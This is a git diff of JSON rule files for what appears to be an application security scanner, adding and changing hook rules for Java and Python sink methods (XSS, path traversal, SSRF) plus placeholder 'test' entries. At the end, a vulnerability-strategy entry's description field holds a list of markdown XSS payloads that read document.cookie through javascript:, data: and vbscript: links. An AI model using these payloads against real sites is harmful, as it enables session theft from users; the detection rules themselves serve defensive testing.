"source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "jakarta.servlet.ServletOutputStream.println(java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "jakarta.servlet.ServletOutputStream.write(byte[])" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "jakarta.servlet.ServletOutputStream.write(byte[],int,int)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1,2", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "java.io.PrintWriter.format(java.lang.String,java.lang.Object[])" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P2,3", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "java.io.PrintWriter.format(java.util.Locale,java.lang.String,java.lang.Object[])" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "java.io.PrintWriter.print(char[])" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "java.io.PrintWriter.print(java.lang.Object)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "java.io.PrintWriter.print(java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1,2", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "java.io.PrintWriter.printf(java.lang.String,java.lang.Object[])" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P2,3", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "java.io.PrintWriter.printf(java.util.Locale,java.lang.String,java.lang.Object[])" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "java.io.PrintWriter.println(char[])" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "java.io.PrintWriter.println(java.lang.Object)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "java.io.PrintWriter.println(java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "java.io.PrintWriter.write(char[])" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "java.io.PrintWriter.write(char[],int,int)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "java.io.PrintWriter.write(java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "java.io.PrintWriter.write(java.lang.String,int,int)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "javax.servlet.ServletOutputStream.print(java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "javax.servlet.ServletOutputStream.println(java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "javax.servlet.ServletOutputStream.write(byte[])" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "javax.servlet.ServletOutputStream.write(byte[],int,int)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "javax.servlet.jsp.JspWriter.print(java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "javax.servlet.jsp.JspWriter.println(java.lang.String)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", + "source": "P1", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "javax.servlet.jsp.JspWriter.write(char[])" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "all", "source": "P1", - "stack_blacklist": [], - "tags": [ - "base64-encoded" - ], - "target": "R", - "track": "false", - "untags": [ - "base64-decoded" + "stack_blacklist": [ + "OutSupport.writeEscapedXml" ], - "value": "org.owasp.esapi.codecs.Base64.encodeBytes(byte[],int,int)" + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "javax.servlet.jsp.JspWriter.write(char[],int,int)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "source": "P1", "stack_blacklist": [], - "tags": [ - "base64-encoded" - ], - "target": "R", - "track": "false", - "untags": [ - "base64-decoded" - ], - "value": "org.owasp.esapi.codecs.Base64.encodeBytes(byte[],int,int,int)" + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "javax.servlet.jsp.JspWriter.write(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "all", "source": "P1", "stack_blacklist": [], - "tags": [ - "html-encoded" - ], - "target": "R", - "track": "false", - "untags": [ - "html-decoded" - ], - "value": "org.owasp.html.PolicyFactory.sanitize(java.lang.String)" + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "javax.servlet.jsp.JspWriter.write(java.lang.String,int,int)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", - "source": "O", + "source": "P1", "stack_blacklist": [], - "tags": [ - "html-encoded" - ], - "target": "R", - "track": "false", - "untags": [ - "html-decoded" - ], - "value": "org.owasp.validator.html.CleanResults.getCleanHTML()" + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "org.apache.tapestry5.internal.services.MarkupWriterImpl.writeRaw(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", - "source": "O", + "source": "P1", "stack_blacklist": [], - "tags": [ - "html-encoded" - ], - "target": "R", - "track": "false", - "untags": [ - "html-decoded" - ], - "value": "org.owasp.validator.html.CleanResults.getCleanXMLDocumentFragment()" + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "org.glassfish.jersey.message.internal.AbstractMessageReaderWriterProvider.writeToAsString(java.lang.String,java.io.OutputStream,javax.ws.rs.core.MediaType)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "P1", "stack_blacklist": [], - "tags": [ - "html-encoded" - ], - "target": "R", - "track": "false", - "untags": [ - "html-decoded" - ], - "value": "org.owasp.validator.html.scan.AbstractAntiSamyScanner.scan(java.lang.String)" - } - ], - "enable": 1, - "type": 1, - "value": "owasp-esapi" - }, - { - "details": [ + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "org.glassfish.jersey.message.internal.ByteArrayProvider.writeTo(byte[],java.lang.Class,java.lang.reflect.Type,java.lang.annotation.Annotation[],javax.ws.rs.core.MediaType,javax.ws.rs.core.MultivaluedMap,java.io.OutputStream)" + }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", - "source": "P2", + "inherit": "false", + "source": "P1", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "java.io.File.(java.io.File,java.lang.String)" + "value": "org.glassfish.jersey.message.internal.DataSourceProvider.writeTo(javax.activation.DataSource,java.lang.Class,java.lang.reflect.Type,java.lang.annotation.Annotation[],javax.ws.rs.core.MediaType,javax.ws.rs.core.MultivaluedMap,java.io.OutputStream)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", + "inherit": "false", "source": "P1", - "stack_blacklist": [ - "org.owasp.esapi.reference.DefaultValidator.isValidDirectoryPath", - "org.owasp.esapi.reference.DefaultValidator.isValidFileName" - ], + "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "java.io.File.(java.lang.String)" + "value": "org.glassfish.jersey.message.internal.FileProvider.writeTo(java.io.File,java.lang.Class,java.lang.reflect.Type,java.lang.annotation.Annotation[],javax.ws.rs.core.MediaType,javax.ws.rs.core.MultivaluedMap,java.io.OutputStream)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", - "source": "P1,2", + "inherit": "false", + "source": "P1", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "java.io.File.(java.lang.String,java.lang.String)" + "value": "org.glassfish.jersey.message.internal.InputStreamProvider.writeTo(java.io.InputStream,java.lang.Class,java.lang.reflect.Type,java.lang.annotation.Annotation[],javax.ws.rs.core.MediaType,javax.ws.rs.core.MultivaluedMap,java.io.OutputStream)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", + "inherit": "false", "source": "P1", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "java.io.File.(java.net.URI)" + "value": "org.glassfish.jersey.message.internal.ReaderProvider.writeTo(java.io.Reader,java.lang.Class,java.lang.reflect.Type,java.lang.annotation.Annotation[],javax.ws.rs.core.MediaType,javax.ws.rs.core.MultivaluedMap,java.io.OutputStream)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "P1,2", + "inherit": "false", + "source": "P1", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "java.io.File.createTempFile(java.lang.String,java.lang.String,java.io.File)" + "value": "org.glassfish.jersey.message.internal.StringMessageProvider.writeTo(java.lang.String,java.lang.Class,java.lang.reflect.Type,java.lang.annotation.Annotation[],javax.ws.rs.core.MediaType,javax.ws.rs.core.MultivaluedMap,java.io.OutputStream)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", - "source": "P1", + "inherit": "false", + "source": "P3", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "java.io.FileInputStream.(java.lang.String)" + "value": "org.mule.module.http.internal.domain.response.DefaultHttpResponse.(org.mule.module.http.internal.domain.response.ResponseStatus,org.apache.commons.collections.MultiMap,org.mule.module.http.internal.domain.HttpEntity)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", - "source": "P1,2", + "inherit": "false", + "source": "P1", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "java.nio.file.FileSystem.getPath(java.lang.String,java.lang.String[])" + "value": "org.mule.module.http.internal.domain.response.HttpResponseBuilder.build(org.mule.module.http.internal.domain.HttpEntity)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "P1", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "java.nio.file.spi.FileSystemProvider.getFileSystem(java.net.URI)" + "value": "org.mule.module.http.internal.domain.response.HttpResponseBuilder.setEntity(org.mule.module.http.internal.domain.HttpEntity)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "source": "P1", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "java.nio.file.spi.FileSystemProvider.newFileSystem(java.net.URI,java.util.Map)" - } - ], - "enable": 1, - "type": 4, - "value": "path-traversal" - }, - { - "details": [ + "value": "org.mule.transformer.simple.SetPayloadMessageProcessor.resolveDataType(org.mule.DefaultMuleEvent,java.lang.Object)" + }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", "source": "P1", - "stack_blacklist": [ - "org.springframework.web.util.UriComponentsBuilder.fromOriginHeader", - "org.springframework.web.util.UriComponentsBuilder.fromUriString" - ], + "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "java.util.regex.Pattern.matcher(java.lang.CharSequence)" + "value": "org.mule.transformer.simple.SetPayloadMessageProcessor.resolveDataType(org.mule.api.MuleEvent,java.lang.Object)" }, { "command": "", @@ -8348,12 +9356,12 @@ "target": "", "track": "true", "untags": [], - "value": "jregex.Pattern.matcher(java.lang.String)" + "value": "org.springframework.http.converter.StringHttpMessageConverter.writeInternal(java.lang.String,org.springframework.http.HttpOutputMessage)" } ], "enable": 1, "type": 4, - "value": "redos" + "value": "reflected-xss" }, { "details": [ @@ -8786,7 +9794,7 @@ "stack_blacklist": [], "tags": [], "target": "R", - "track": "", + "track": "false", "untags": [], "value": "org.springframework.cloud.config.server.resource.ResourceController.retrieve(java.lang.String,java.lang.String,java.lang.String,java.lang.String,boolean)" }, @@ -9798,6 +10806,104 @@ "type": 4, "value": "ssrf" }, + { + "details": [ + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1,2", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "coldfusion.runtime.SessionScope.bind(java.lang.String,java.lang.Object)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "P1,2", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "jakarta.servlet.http.HttpSession.putValue(java.lang.String,java.lang.Object)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "P1,2", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "jakarta.servlet.http.HttpSession.setAttribute(java.lang.String,java.lang.Object)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "P1,2", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "javax.servlet.http.HttpSession.putValue(java.lang.String,java.lang.Object)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "true", + "source": "P1,2", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "javax.servlet.http.HttpSession.setAttribute(java.lang.String,java.lang.Object)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1,2", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "org.apache.struts2.dispatcher.SessionMap.put(java.lang.Object,java.lang.Object)" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1,2", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "play.mvc.Http$Session.put(java.lang.String,java.lang.String)" + } + ], + "enable": 1, + "type": 4, + "value": "trust-boundary-violation" + }, { "details": [ { @@ -10370,14 +11476,14 @@ }, { "command": "", - "ignore_blacklist": false, + "ignore_blacklist": true, "ignore_internal": false, "inherit": "false", "source": "P1", "stack_blacklist": [], "tags": [], "target": "O", - "track": "", + "track": "false", "untags": [], "value": "org.xml.sax.InputSource.(java.io.Reader)" }, diff --git a/static/data/php_hooktype.json b/static/data/php_hooktype.json index 89a0ad7ce..517fefb6c 100644 --- a/static/data/php_hooktype.json +++ b/static/data/php_hooktype.json @@ -1,4 +1,70 @@ [ + { + "created_by": 1, + "enable": 1, + "language": 3, + "name": "1", + "name_en": null, + "name_zh": "1", + "system_type": 0, + "type": 3, + "value": "1" + }, + { + "created_by": 1, + "enable": 1, + "language": 3, + "name": "1", + "name_en": null, + "name_zh": "1", + "system_type": 0, + "type": 4, + "value": "1" + }, + { + "created_by": 1, + "enable": 1, + "language": 3, + "name": "123", + "name_en": null, + "name_zh": "123", + "system_type": 0, + "type": 3, + "value": "1" + }, + { + "created_by": 1, + "enable": 1, + "language": 3, + "name": "123", + "name_en": null, + "name_zh": "123", + "system_type": 0, + "type": 4, + "value": "1" + }, + { + "created_by": 1, + "enable": 1, + "language": 3, + "name": "3", + "name_en": null, + "name_zh": "3", + "system_type": 0, + "type": 3, + "value": "3" + }, + { + "created_by": 1, + "enable": 1, + "language": 3, + "name": "3", + "name_en": null, + "name_zh": "3", + "system_type": 0, + "type": 4, + "value": "3" + }, { "created_by": 1, "enable": 1, @@ -58,9 +124,9 @@ "created_by": 1, "enable": 1, "language": 3, - "name": "\u547d\u4ee4\u6267\u884c ", + "name": "\u547d\u4ee4\u6267\u884c123", "name_en": "OS Command Injection", - "name_zh": "\u547d\u4ee4\u6267\u884c ", + "name_zh": "\u547d\u4ee4\u6267\u884c123", "system_type": 1, "type": 4, "value": "cmd-injection" @@ -340,6 +406,28 @@ "type": 4, "value": "ssrf" }, + { + "created_by": 1, + "enable": 1, + "language": 3, + "name": "test", + "name_en": null, + "name_zh": "test", + "system_type": 0, + "type": 3, + "value": "test" + }, + { + "created_by": 1, + "enable": 1, + "language": 3, + "name": "test", + "name_en": null, + "name_zh": "test", + "system_type": 0, + "type": 4, + "value": "test" + }, { "created_by": 1, "enable": 1, diff --git a/static/data/python_full_policy.json b/static/data/python_full_policy.json index 92610e536..eff2a626d 100644 --- a/static/data/python_full_policy.json +++ b/static/data/python_full_policy.json @@ -358,7 +358,7 @@ "value": "Cryptodome.Cipher._mode_openpgp.OpenPgpMode.encrypt" } ], - "enable": 0, + "enable": 1, "type": 4, "value": "crypto-bad-ciphers" }, @@ -1854,7 +1854,7 @@ "value": "flask.app.Flask.make_response" } ], - "enable": 0, + "enable": 1, "type": 4, "value": "reflected-xss" }, diff --git a/static/data/python_hooktype.json b/static/data/python_hooktype.json index 88607430c..c21a585b8 100644 --- a/static/data/python_hooktype.json +++ b/static/data/python_hooktype.json @@ -1,4 +1,70 @@ [ + { + "created_by": 1, + "enable": 1, + "language": 2, + "name": "1", + "name_en": null, + "name_zh": "1", + "system_type": 0, + "type": 3, + "value": "1" + }, + { + "created_by": 1, + "enable": 1, + "language": 2, + "name": "1", + "name_en": null, + "name_zh": "1", + "system_type": 0, + "type": 4, + "value": "1" + }, + { + "created_by": 1, + "enable": 1, + "language": 2, + "name": "123", + "name_en": null, + "name_zh": "123", + "system_type": 0, + "type": 3, + "value": "1" + }, + { + "created_by": 1, + "enable": 1, + "language": 2, + "name": "123", + "name_en": null, + "name_zh": "123", + "system_type": 0, + "type": 4, + "value": "1" + }, + { + "created_by": 1, + "enable": 1, + "language": 2, + "name": "3", + "name_en": null, + "name_zh": "3", + "system_type": 0, + "type": 3, + "value": "3" + }, + { + "created_by": 1, + "enable": 1, + "language": 2, + "name": "3", + "name_en": null, + "name_zh": "3", + "system_type": 0, + "type": 4, + "value": "3" + }, { "created_by": 1, "enable": 1, @@ -47,9 +113,9 @@ "created_by": 1, "enable": 1, "language": 2, - "name": "\u547d\u4ee4\u6267\u884c ", + "name": "\u547d\u4ee4\u6267\u884c123", "name_en": "OS Command Injection", - "name_zh": "\u547d\u4ee4\u6267\u884c ", + "name_zh": "\u547d\u4ee4\u6267\u884c123", "system_type": 1, "type": 4, "value": "cmd-injection" @@ -461,6 +527,28 @@ "type": 4, "value": "ssrf" }, + { + "created_by": 1, + "enable": 1, + "language": 2, + "name": "test", + "name_en": null, + "name_zh": "test", + "system_type": 0, + "type": 3, + "value": "test" + }, + { + "created_by": 1, + "enable": 1, + "language": 2, + "name": "test", + "name_en": null, + "name_zh": "test", + "system_type": 0, + "type": 4, + "value": "test" + }, { "created_by": 1, "enable": 1, diff --git a/static/data/python_policy.json b/static/data/python_policy.json index 380113cba..e7135ac95 100644 --- a/static/data/python_policy.json +++ b/static/data/python_policy.json @@ -78,6 +78,195 @@ "type": 4, "value": "code-execution" }, + { + "details": [ + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1,2,plaintext", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "Crypto.Cipher._mode_cbc.CbcMode.encrypt" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1,2,plaintext", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "Crypto.Cipher._mode_cfb.CfbMode.encrypt" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1,2,plaintext", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "Crypto.Cipher._mode_ctr.CtrMode.encrypt" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1,2,plaintext", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "Crypto.Cipher._mode_eax.EaxMode.encrypt" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1,2,plaintext", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "Crypto.Cipher._mode_ecb.EcbMode.encrypt" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1,2,plaintext", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "Crypto.Cipher._mode_ofb.OfbMode.encrypt" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1,2,plaintext", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "Crypto.Cipher._mode_openpgp.OpenPgpMode.encrypt" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1,2,plaintext", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "Cryptodome.Cipher._mode_cbc.CbcMode.encrypt" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1,2,plaintext", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "Cryptodome.Cipher._mode_cfb.CfbMode.encrypt" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1,2,plaintext", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "Cryptodome.Cipher._mode_ctr.CtrMode.encrypt" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1,2,plaintext", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "Cryptodome.Cipher._mode_eax.EaxMode.encrypt" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1,2,plaintext", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "Cryptodome.Cipher._mode_ecb.EcbMode.encrypt" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1,2,plaintext", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "Cryptodome.Cipher._mode_ofb.OfbMode.encrypt" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P1,2,plaintext", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "Cryptodome.Cipher._mode_openpgp.OpenPgpMode.encrypt" + } + ], + "enable": 1, + "type": 4, + "value": "crypto-bad-ciphers" + }, { "details": [ { @@ -1141,6 +1330,39 @@ "type": 4, "value": "redos" }, + { + "details": [ + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P2,content", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "django.http.response.HttpResponse.__init__" + }, + { + "command": "", + "ignore_blacklist": false, + "ignore_internal": false, + "inherit": "false", + "source": "P2,rv", + "stack_blacklist": [], + "tags": [], + "target": "", + "track": "true", + "untags": [], + "value": "flask.app.Flask.make_response" + } + ], + "enable": 1, + "type": 4, + "value": "reflected-xss" + }, { "details": [ { diff --git a/static/data/vul_strategy.json b/static/data/vul_strategy.json index 3f52604ab..0d0d6e708 100644 --- a/static/data/vul_strategy.json +++ b/static/data/vul_strategy.json @@ -1,4 +1,52 @@ [ + { + "level": 1, + "state": "disable", + "system_type": 0, + "user": 1, + "vul_desc": "[a](javascript:prompt(document.cookie)) \n[a](j a v a s c r i p t:prompt(document.cookie)) \n![a](javascript:prompt(document.cookie))\\ \n \n<javascript:alert('XSS')> \n![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\\ \n[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K) \n[a](javascript:alert('XSS')) \n![a'\"`onerror=prompt(document.cookie)](x)\\ \n[citelol]: (javascript:prompt(document.cookie)) \n[notmalicious](javascript:window.onerror=alert;throw%20document.cookie) \n[test](javascript://%0d%0aprompt(1)) \n[test](javascript://%0d%0aprompt(1);com) \n[notmalicious](javascript:window.onerror=alert;throw%20document.cookie) \n[notmalicious](javascript://%0d%0awindow.onerror=alert;throw%20document.cookie) \n[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K) \n[clickme](vbscript:alert(document.domain)) \n_http://danlec_@.1 style=background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAIAAAABACAMAAADlCI9NAAACcFBMVEX/AAD//////f3//v7/0tL/AQH/cHD/Cwv/+/v/CQn/EBD/FRX/+Pj/ISH/PDz/6Oj/CAj/FBT/DAz/Bgb/rq7/p6f/gID/mpr/oaH/NTX/5+f/mZn/wcH/ICD/ERH/Skr/3Nz/AgL/trb/QED/z8//6+v/BAT/i4v/9fX/ZWX/x8f/aGj/ysr/8/P/UlL/8vL/T0//dXX/hIT/eXn/bGz/iIj/XV3/jo7/W1v/wMD/Hh7/+vr/t7f/1dX/HBz/zc3/nJz/4eH/Zmb/Hx//RET/Njb/jIz/f3//Ojr/w8P/Ghr/8PD/Jyf/mJj/AwP/srL/Cgr/1NT/5ub/PT3/fHz/Dw//eHj/ra3/IiL/DQ3//Pz/9/f/Ly//+fn/UFD/MTH/vb3/7Oz/pKT/1tb/2tr/jY3/6en/QkL/5OT/ubn/JSX/MjL/Kyv/Fxf/Rkb/sbH/39//iYn/q6v/qqr/Y2P/Li7/wsL/uLj/4+P/yMj/S0v/GRn/cnL/hob/l5f/s7P/Tk7/WVn/ior/09P/hYX/bW3/GBj/XFz/aWn/Q0P/vLz/KCj/kZH/5eX/U1P/Wlr/cXH/7+//Kir/r6//LS3/vr7/lpb/lZX/WFj/ODj/a2v/TU3/urr/tbX/np7/BQX/SUn/Bwf/4uL/d3f/ExP/y8v/NDT/KSn/goL/8fH/qan/paX/2Nj/HR3/4OD/VFT/Z2f/SEj/bm7/v7//RUX/Fhb/ycn/V1f/m5v/IyP/xMT/rKz/oKD/7e3/dHT/h4f/Pj7/b2//fn7/oqL/7u7/2dn/TEz/Gxv/6ur/3d3/Nzf/k5P/EhL/Dg7/o6P/UVHe/LWIAAADf0lEQVR4Xu3UY7MraRRH8b26g2Pbtn1t27Zt37Ft27Zt6yvNpPqpPp3GneSeqZo3z3r5T1XXL6nOFnc6nU6n0+l046tPruw/+Vil/C8tvfscquuuOGTPT2ZnRySwWaFQqGG8Y6j6Zzgggd0XChWLf/U1OFoQaVJ7AayUwPYALHEM6UCWBDYJbhXfHjUBOHvVqz8YABxfnDCArrED7jSAs13Px4Zo1jmA7eGEAXvXjRVQuQE4USWqp5pNoCthALePFfAQ0OcchoCGBAEPgPGiE7AiacChDfBmjjg7DVztAKRtnJsXALj/Hpiy2B9wofqW9AQAg8Bd8VOpCR02YMVEE4xli/L8AOmtQMQHsP9IGUBZedq/AWJfIez+x4KZqgDtBlbzon6A8GnonOwBXNONavlmUS2Dx8XTjcCwe1wNvGQB2gxaKhbV7Ubx3QC5bRMUuAEvA9kFzzW3TQAeVoB5cFw8zQUGPH9M4LwFgML5IpL6BHCvH0DmAD3xgIUpUJcTmy7UQHaV/bteKZ6GgGr3eAq4QQEmWlNqJ1z0BeTvgGfz4gAFsDXfUmbeAeoAF0OfuLL8C91jHnCtBchYq7YzsMsXIFkmDDsBjwBfi2o6GM9IrOshIp5mA6vc42Sg1wJMEVUJlPgDpBzWb3EAVsMOm5m7Hg5KrAjcJJ5uRn3uLAvosgBrRPUgnAgApC2HjtpRwFTneZRpqLs6Ak+Lp